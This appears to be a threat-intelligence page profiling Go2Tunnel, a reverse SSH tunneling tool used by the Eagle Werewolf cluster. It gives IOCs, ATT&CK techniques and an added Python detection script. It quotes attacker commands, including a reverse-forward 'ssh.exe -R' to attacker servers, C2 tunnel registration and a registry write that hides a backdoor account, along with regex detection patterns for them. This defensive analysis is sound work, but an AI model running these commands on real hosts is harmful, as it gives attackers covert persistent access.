Go2Tunnel
Go2Tunnel is a Go-based SSH tunneling tool used by the Eagle Werewolf cluster to establish and maintain reverse SSH tunnels from compromised Windows hosts. It has been observed as part of multi-stage phishing and Telegram-delivered intrusion chains targeting government and industrial organizations and individuals involved in UAV production and engineering. In one documented campaign, a phishing-delivered archive disguised as a 1C-related file led to execution of a patched .NET installer component that decrypted a Go dropper; that dropper unpacked executables, scripts, SSH keys, and configuration files, created a local user named "config," installed files under "C:\Program Files\System Event Service," started SSH services, granted privileges to the SSHD service account, and launched Go2Tunnel under filenames including "shh-tunnel.exe" and later "syseventservice-update.exe." In Eagle Werewolf activity linked to February 2026 Starlink-themed lures, Go2Tunnel was also used alongside Rust and Go droppers and AquilaRAT to support persistent remote access.
Go2Tunnel reads tunnel parameters from local configuration files such as "ssh_tunnel_config" or "syseventservice-update_config" and launches SSH with reverse port forwarding in the form "ssh.exe -R <ServerTunnelPort>:127.0.0.1:22" to expose the victim’s local SSH service. The SSH command uses the key file "C:\Program Files\System Event Service\event-server" and enables options including disabled strict host key checking, exit-on-forward-failure, and server alive interval settings. If a tunnel port is not predefined, Go2Tunnel can request one by sending an HTTP POST to "http://<serverHostname>:<ServerWebPort>/tunnel/register." In a newer observed version, it supported a "--db" flag for console execution with detailed logging and sent registration data including machine ID, computer name, generated username, current username, and generated password to "/tunnel/register" on 145.223.70[.]69:80. The server response supplied the SSH tunnel port, a Windows public key, a tunnel private key, and a server host key. Go2Tunnel then wrote the returned public key into authorized_keys for both the current user and the attacker-created user before starting the reverse tunnel.
The malware monitors tunnel health by checking for an established TCP connection to the configured SSH server and port via PowerShell Get-NetTCPConnection; if the check fails, it terminates the SSH process, resolves the configured address again, and restarts the tunnel. High-confidence infrastructure and indicators directly associated with Go2Tunnel activity in the underlying reporting include IP addresses 16.16.179.83, 5.252.22.10, and 145.223.70[.]69, as well as SHA-256 hashes 15b3dcd795d417c69a627e13382800cc0cf005e9f5d0345e22a02f460b052ea1, 2de2c9ab37ce5abfcd7e9018b1cb00066209b0b9ecdf70249148f53389dca5b1, 5faa4da85e2657682fd40f5a86d61e87a3e70c3dff81335f226437c755a89f4a, 6aa1fc0c2b7a01952b92e7af4f69fc602d34da95a872c57e7cfe34e918086c89, 957a9705b200cd0f059d62d7b21e97db260b9b6c0c5ddf20c38d236103cb799b, and fac77b7f1150c00dd5ca9da0f93e2f073a7eb70e2f4fd82a267afbc938a6e175.
Groups observed using it
1 distinct threat actor attributed by public researchers.
Eagle Werewolf's arsenal includes the following malware: a C# dropper (used in previous campaigns), a Rust dropper, a Go dropper, Go2Tunnel (SSH tunneling tool), and AquilaRAT.
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Execution
2 techniques
checks whether the server is up using a ps1 command: -Command "Get-NetTCPConnection -RemoteAddress <serverHostname> -RemotePort <ServerSshPort> -State Established -OwningProcess <sshProcess_Pid>"
The URL hxxps://battleflight[.]org/download/installer hosted the executable BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
Persistence
6 techniques
Subsequently, it attempts to add the new account to the Administrators group.
Most of the files are a complete kit for setting up an SSH connection: public and private keys and configs. The scripts... launch SSHD and ssh-agent after configuring the public and private key.
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Name $sshUserName -Value 0 -Type DWord
The scripts perform the following actions: they create a new user with the credentials: $sshUserName = "config"
inst_u.ps1 also writes an event... The script then checks for the account $sshUserName and, if necessary, creates it and sets the password generated by common.ps1.
Privilege Escalation
3 techniques
Subsequently, it attempts to add the new account to the Administrators group.
Most of the files are a complete kit for setting up an SSH connection: public and private keys and configs. The scripts... launch SSHD and ssh-agent after configuring the public and private key.
Stealth
6 techniques
The appwiz.cpl applet is packed with UPX and obfuscated with Oreans Code Virtualizer.
The dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
The archive with the grand name 1С_модуль_заказа_дрон-v11.zip contains a small file, СВЯЗЬ РЭБ список Гум.exe, bearing the yellow "1C" icon everyone knows. When the file is launched, the user sees the standard "1C:Enterprise 8.3" loading window, followed by a database opening.
At the final stage of execution, the Rust dropper deletes the insider-[a-zA-Z0-9]{6} directory.
In the InitManifest method, the resource _1C_Module.tmp is decrypted and saved in the temp folder. The decrypted file turns out to be a Go dropper, which decrypts 23 files.
The script adds a configuration string to the registry to hide the new account from the login screen.
Defense Impairment
1 technique
Lateral Movement
1 technique
The scripts... launch SSHD and ssh-agent... It takes the ports for creating the tunnel from the adjacent ssh_tunnel_config file ...: C:\Program Files\System Event Service\ssh.exe -R <ServerTunnelPort> :127.0.0.1:22
Collection
1 technique
The updater.exe executable is a Go dropper that unpacks embedded gzip archives and launches final stage loaders.
Command and Control
3 techniques
When serverTunnelPort is not specified, a POST request is made to the following address: http://<serverHostname>:<ServerWebPort>/tunnel/register
This executable is written in Go and is a tool for establishing a tunnel... ssh.exe -R <ServerTunnelPort> :127.0.0.1:22 -N -T -i ...
The loader then fetches the Node.js interpreter (if it is not present in the system) and the next stage obfuscated JS script.
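The following Python is an added illustration, not code from this page or from the reports it summarizes: it shows how a defender could flag, over process-creation telemetry, the behaviours described in the family description above and in the techniques list (the reverse forward to the local SSH service, the key under the System Event Service directory, disabled host-key checking, the Get-NetTCPConnection health probe, and the account-hiding registry write). The sample events, pids, ports and server address are constructed for the example.

```python
import re

# Constructed process-creation events (not real telemetry) shaped like the command
# lines this page reports for Go2Tunnel; pids, ports and the server address are invented.
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": r'ssh.exe -R 40022:127.0.0.1:22 -N -T -i "C:\Program Files\System Event Service\event-server" '
                             r'-o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 tunnel@198.51.100.7'},
    {"pid": 4188, "cmdline": r'powershell.exe -Command "Get-NetTCPConnection -RemoteAddress 198.51.100.7 -RemotePort 22 '
                             r'-State Established -OwningProcess 4120"'},
    {"pid": 4201, "cmdline": r'''powershell.exe -Command "Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' -Name config -Value 0 -Type DWord"'''},
    {"pid": 5000, "cmdline": r"ssh.exe -L 8080:127.0.0.1:80 admin@intranet.example"},  # ordinary local forward: must not fire
]

# (rule name, pattern over the command line); patterns follow the page's description of
# the tool and should be tuned against your own telemetry before deployment.
RULES = [
    ("reverse_tunnel_to_local_sshd", re.compile(r"-R\s*\d+\s*:127\.0\.0\.1:22\b")),
    ("ssh_key_in_system_event_service_dir", re.compile(r'-i\s+"?C:\\Program Files\\System Event Service\\', re.I)),
    ("host_key_checking_disabled", re.compile(r"StrictHostKeyChecking[= ]no", re.I)),
    ("tunnel_health_probe", re.compile(r"Get-NetTCPConnection.*-State\s+Established.*-OwningProcess\s+\d+", re.I)),
    ("hidden_account_registry_write", re.compile(r"SpecialAccounts\\UserList.*-Value\s+0\b", re.I)),
]

def classify(event):
    """Names of all rules whose pattern matches this event's command line."""
    return [name for name, pat in RULES if pat.search(event["cmdline"])]

def scan(events):
    """pid -> matched rule names, for events that matched at least one rule."""
    hits = {}
    for ev in events:
        matched = classify(ev)
        if matched:
            hits[ev["pid"]] = matched
    return hits

def probed_tunnels(events):
    """Pids of reverse-tunnel ssh processes that a Get-NetTCPConnection probe names via
    -OwningProcess; the probe-and-restart loop is the tool's distinguishing behaviour."""
    hits = scan(events)
    tunnels = {pid for pid, names in hits.items() if "reverse_tunnel_to_local_sshd" in names}
    probed = set()
    for ev in events:
        m = re.search(r"-OwningProcess\s+(\d+)", ev["cmdline"], re.I)
        if m and "tunnel_health_probe" in hits.get(ev["pid"], []) and int(m.group(1)) in tunnels:
            probed.add(int(m.group(1)))
    return probed
```

Pairing the tunnel process with the probe that references its pid cuts down on false positives from legitimate `ssh -R` use, which the single-command rules alone would still flag.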
IOCs tracked for this family
21 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
4 sources tracked across advisories, community write-ups, and news.
An SSH tunneling tool used to establish reverse tunnels to attacker infrastructure. It registers with the C2 to obtain tunnel parameters and keys, updates configuration, writes authorized_keys entries, and launches ssh.exe with reverse port forwarding.
An SSH tunneling tool used to establish reverse tunnels. It registers with a C2 server to obtain tunnel parameters and keys, writes authorized_keys entries for local users, updates tunnel configuration, and launches ssh.exe with reverse port forwarding.
SSH tunneling tool used to establish reverse tunnels to attacker infrastructure. It registers the host with C2, receives keys and tunnel parameters, writes authorized_keys entries, and launches ssh.exe for reverse port forwarding.
Go-based tunneling tool dropped from a fake 1C-themed installer. It establishes a reverse SSH tunnel using bundled SSH binaries, keys, and configs, optionally registers for a tunnel port over HTTP, monitors tunnel health, and restarts the SSH process if connectivity is lost.